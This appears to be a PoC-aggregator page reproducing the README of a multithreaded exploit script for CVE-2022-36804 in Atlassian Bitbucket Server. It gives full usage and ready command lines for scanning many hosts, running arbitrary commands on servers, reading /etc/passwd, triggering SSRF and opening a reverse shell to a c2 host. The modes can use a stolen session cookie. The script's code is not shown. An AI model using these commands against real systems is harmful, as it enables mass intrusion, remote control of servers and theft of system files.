CVE-2022-36804 PoC — Atlassian Bitbucket Server 安全漏洞

Source

Associated Vulnerability

Description

Multithreaded exploit script for CVE-2022-36804 affecting BitBucket versions <8.3.1

Readme

# CVE-2022-36804-PoC
Multithreaded exploit script for CVE-2022-36804 affecting (most) BitBucket versions <8.3.1
See the full advisory here https://jira.atlassian.com/browse/BSERV-13438

All credit to [TheGrandPew](https://twitter.com/TheGrandPew) for discovery

The script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances.

The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.

Do not use for malicious purposes.

## Usage
```bash
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
                         [--skip-check] [-t THREADS] [-v]
                         repos [repos ...]

CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  repos                 Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on

optional arguments:
  --auth-cookie AUTH_COOKIE
                        Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
  --proxy PROXY         HTTP Proxy: <http/https>://<ip>:<port>
  -e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
                        Exploit to perform
  --cmd CMD             Command to execute for the 'rce' exploit (curl http://example.com)
  --knary KNARY         Knary to respond too via DNS for the 'ssrf' exploit
  --server-file SERVER_FILE
                        Server file to download for the 'download' exploit (/etc/passwd)
  --host HOST           Hostname or IP address of c2 for the 'rev_shell' exploit
  --port PORT           Port of the c2 for the 'rev_shell' exploit
  --skip-check          Skip vulnerability checking stage
  -t THREADS, --threads THREADS
                        Worker Threads
  -v, --verbose         Increase output verbosity level
```
### Exploit modes

#### Check
> Single Host
>
> `CVE-2022-36804.py http://bitbucket.local:7990/`
>
> Multiple Hosts and piping vulnerable hosts and repositories exploited to file
>
> `CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts`

#### RCE (Remote Code Execution)
> `CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/`

#### SSRF (Server-Side Request Forgery)
> Perform a DNS request to the specified knary
> 
> `CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/`

#### Download
> Download a repository with the target file `/etc/passwd`, this will save the compressed repository to a randomised file name.
>
> `CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/`

#### Rev_shell (Generates a reverse sh shell to the specified host and port)
> `CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/`

File Snapshot

 [4.0K]  /data/pocs/372c50272100a17156bea22b73d2c0c4a14a5c1c
├── [ 14K]  CVE-2022-36804.py
├── [3.3K]  README.md
└── [  44]  requirements.txt

0 directories, 3 files

Remarks